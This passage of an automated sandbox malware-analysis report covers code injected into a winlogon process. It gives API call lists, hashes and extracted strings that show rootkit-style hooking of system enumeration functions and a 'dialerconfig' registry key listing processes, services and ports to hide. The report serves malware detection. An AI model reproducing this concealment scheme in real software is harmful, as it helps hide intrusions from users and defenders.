                                                        • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                        • Instruction Fuzzy Hash: 9FF03A2A21CF24D0D630DB89E44976ABBA0F788BD5F148151FA8E43B69CE3CC681CF00

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 265 225dc61273c-225dc6127a4 call 225dc6129d4 * 4 274 225dc6127aa-225dc6127ad 265->274 275 225dc6129b2 265->275 274->275 277 225dc6127b3-225dc6127b6 274->277 276 225dc6129b4-225dc6129d0 275->276 277->275 278 225dc6127bc-225dc6127bf 277->278 278->275 279 225dc6127c5-225dc6127e6 VirtualAlloc 278->279 279->275 280 225dc6127ec-225dc61280c 279->280 281 225dc612838-225dc61283f 280->281 282 225dc61280e-225dc612836 280->282 283 225dc612845-225dc612852 281->283 284 225dc6128df-225dc6128e6 281->284 282->281 282->282 283->284 285 225dc612858-225dc61286a LoadLibraryA 283->285 286 225dc6128ec-225dc612901 284->286 287 225dc612992-225dc6129b0 284->287 289 225dc6128ca-225dc6128d2 285->289 290 225dc61286c-225dc612878 285->290 286->287 288 225dc612907 286->288 287->276 291 225dc61290d-225dc612921 288->291 289->285 293 225dc6128d4-225dc6128d9 289->293 292 225dc6128c5-225dc6128c8 290->292 295 225dc612982-225dc61298c 291->295 296 225dc612923-225dc612934 291->296 292->289 297 225dc61287a-225dc61287d 292->297 293->284 295->287 295->291 299 225dc612936-225dc61293d 296->299 300 225dc61293f-225dc612943 296->300 301 225dc6128a7-225dc6128b7 297->301 302 225dc61287f-225dc6128a5 297->302 303 225dc612970-225dc612980 299->303 304 225dc612945-225dc61294b 300->304 305 225dc61294d-225dc612951 300->305 306 225dc6128ba-225dc6128c1 301->306 302->306 303->295 303->296 304->303 307 225dc612963-225dc612967 305->307 308 225dc612953-225dc612961 305->308 306->292 307->303 310 225dc612969-225dc61296c 307->310 308->303 310->303
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AllocLibraryLoadVirtual
                                                        • String ID:
                                                        • API String ID: 3550616410-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: b5a9ffdff3e85ff3f1f12f145a610503c53f3502f35e5ceb3ac916478b11310c
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: D261363AB02AA097DF56CF5ED00876DB392F754BA6F18C521CE5907788DA38D852C700

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00000225DC641628: GetProcessHeap.KERNEL32 ref: 00000225DC641633
                                                          • Part of subcall function 00000225DC641628: HeapAlloc.KERNEL32 ref: 00000225DC641642
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416B2
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416DF
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6416F9
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641719
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641734
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641754
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64176F
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64178F
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417AA
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6417CA
                                                        • Sleep.KERNEL32 ref: 00000225DC641AD7
                                                        • SleepEx.KERNELBASE ref: 00000225DC641ADD
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417E5
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641805
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641820
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641840
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64185B
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64187B
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641896
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6418A0
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: b89290e72799dd3975187c06206b195ef9f7eec7f326f7ac498d84b976088364
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 0731356921CE61B2FF509BAED6593A933A4AB54BC6F04D4A19E0F873E5FF30C451C210

                                                        Control-flow Graph (figure, text placeholder): function spanning basic blocks 225dc67273c-225dc6729d0; the entry block calls subroutine 225dc6729d4 four times; VirtualAlloc is called in block 225dc6727c5-225dc6727e6.
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: c822286e1b467df8a310eb99b0d592360f537eec13a50740bd2f5dfddf19021e
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: A561483AB01AA0D7DB56CF9AD00876DB3A2F754BA5F18C921CF5907BC8DA38D852C700

                                                        Control-flow Graph (figure, text placeholder): function spanning basic blocks 225dc6ad6cc-225dc6ad740; HeapAlloc is called in block 225dc6ad712-225dc6ad72a; calls to subroutines 225dc6ad6ac, 225dc6b0720 and 225dc6ab85c.
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AllocHeap
                                                        • String ID:
                                                        • API String ID: 4292702814-0
                                                        • Opcode ID: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                        • Instruction ID: d48ce241fd5c6b57c9d66a3839ec59588558f897ab86195e616c0656e38ee758
                                                        • Opcode Fuzzy Hash: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                        • Instruction Fuzzy Hash: 21F05E6C301E2161FE6DDBEE995D3A552955F89B82F6CE4344D0AC67E2EE3CC481C620
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 8b409eee056ac65ba81e46254c59d85845063fb26c80b4bd130284c66f771075
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 96B1B37A290E60A2EBAADFADC44876963A5F744B86F24D016DE0DD3B95DF35CC81C340
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 02e5d621d8295eb5dd385e75f9606a0c78f62cf6da70878d64f9e7b1c174dd69
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: DCB1B47A21CE60A6EB968FEDC4487A973A5F744B8AF24D056DE0A53B94DF34CC41C340
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 3b87e895a044953073a839ffa4b4feaece301703ffc135d08af6657be6a0d668
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 14317276205F9099EB64DFA4E8443EE73A1F78474AF448029DB4E57B94EF38C548CB10
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: a0dd4a3191c2f22ec65cd5f9c7d8c34c65d38d6a3a9ca6151c6be4ce44add157
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 29318376219F909AEB609FA4E8447ED73A0F784745F44812ADB4E57B94EF38C548CB10
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 4dbdfab791ea173b22a2c1feee1540d37dae8e72db698209205baee473c09c96
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: 7631C93A214F90A6EB64CFA9E8443DE73A0F789756F504126EB9D43B54DF38C145CB00
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: f4e1f7a423249601853f9bf4c02ae152ed9a85bcd9bd447fde6e0ecec31a17ad
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: 1531C73A218F90A6DB60DFA9E8443EE73A0F789755F504126EB9E43B94DF38C145CB00
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: d33dc497d620ec2850d47fa6d7599d0f75ef197f864d2f2ea1a1538dcd62ba05
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: 54113026714F119AEF50CFE8E8593A833A4F719759F440E21DB6D467A4DF78C1A8C380
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                        • Instruction ID: da0f1b53d22c38e7f028f1682345193667a56556076439a06e8349e4d1e3cf91
                                                        • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                        • Instruction Fuzzy Hash: 3C510926700FE0A9FB20DFBAA84879E7BA5F7447D5F248114EE58A7B95DB38C411C700
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                        • Instruction ID: 712154813c46b612020be7a143dde11e41283ee14142f5bab4be78c3f0fa479c
                                                        • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                        • Instruction Fuzzy Hash: 11511A26B0CBA0A9FB20DBBAE84879E7BA1F740BD5F148155EE5927B95DB38C001C700
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                        • Instruction ID: fee74b632db8da7adfbcef3e822971e4130eb4171b3ad2da802a4781d9383549
                                                        • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                        • Instruction Fuzzy Hash: EAF062B57146A49EDBA98F6CA80671A77E1F308381FD4C029D68983B04D33C8061CF04

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 545a197093dbf33f1111aaff3c94dd347963510d91bf182c1d2d2b3e49a62449
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: 1B71FE7A314E24E6EB10DFAAE85869D33B5FB84B8AF109111DE4E97B69DF38C444C740

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: d2d635d82ad37731a82d28168a5eda6b08545a77464cd3cb2b7161adfafd8aad
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 22516C7A200F94DAEB54CFAAE54835A77A6F789F9AF148124DE4A47728DF3CC049C700

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: fb1b484c7ebee393b1b53cdd5cd81ac2c1ca147a5507fda1b24fca473b782784
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 46515E7A214F9496EB64CFAAE54836A77A1F789F9AF148124DF4A07B58DF3CC045C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: bae3e35cc23bdf7e795311711b41c652c83ad71068a264824faefe60a6291ab9
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: 583195AC240D6AB0EA46EFEDE8697D46361B70474BF94D023D80986675EF3CC249C350
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 52c27ab1b4cc8d1b0b7a026bbb00d0580f7e8789e5eca17ee175a033894297e0
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: 9231B8AC518DAAB0EB46EFEDE9597D43361B70434BF90D093940B025B1AF38828AC350
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 7539ecd07ed9e19813cea4b70ed8e4e8e5b401edcb5cd18e99020899339b4ff2
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: DF81122D702E71A6FE60EBED944D35962E0EB95783F18C425AB4983797EF38C946C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 22cde9f525fffbeb1c6e8d8417a217ee6af8dab08b44ae11a5e6f92b2a2e472d
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 5581E26D710E61A6FA54EBEE944D35923D0EB85B82F58C8259B0947FD7EF38C846CB00
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 00000225DC6ACE37
                                                        • FlsGetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACEBC
                                                        • SetLastError.KERNEL32 ref: 00000225DC6ACED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,00000225DC6AECCC,?,?,?,?,00000225DC6ABF9F,?,?,?,?,?,00000225DC6A7AB0), ref: 00000225DC6ACF2C
                                                          • Part of subcall function 00000225DC6AD6CC: HeapAlloc.KERNEL32 ref: 00000225DC6AD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACF54
                                                          • Part of subcall function 00000225DC6AD744: HeapFree.KERNEL32 ref: 00000225DC6AD75A
                                                          • Part of subcall function 00000225DC6AD744: GetLastError.KERNEL32 ref: 00000225DC6AD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACF76
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 16b8eac9f94798cf318e2989be29cf1ddfaa1c447e8d99b4c7a956a79ddaff1c
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: 47415868300E6472FE68EBFD565D36922826F887B2F34C724A936C77E6DE39D441D201
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 00000225DC64CE37
                                                        • FlsGetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CEBC
                                                        • SetLastError.KERNEL32 ref: 00000225DC64CED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF0D
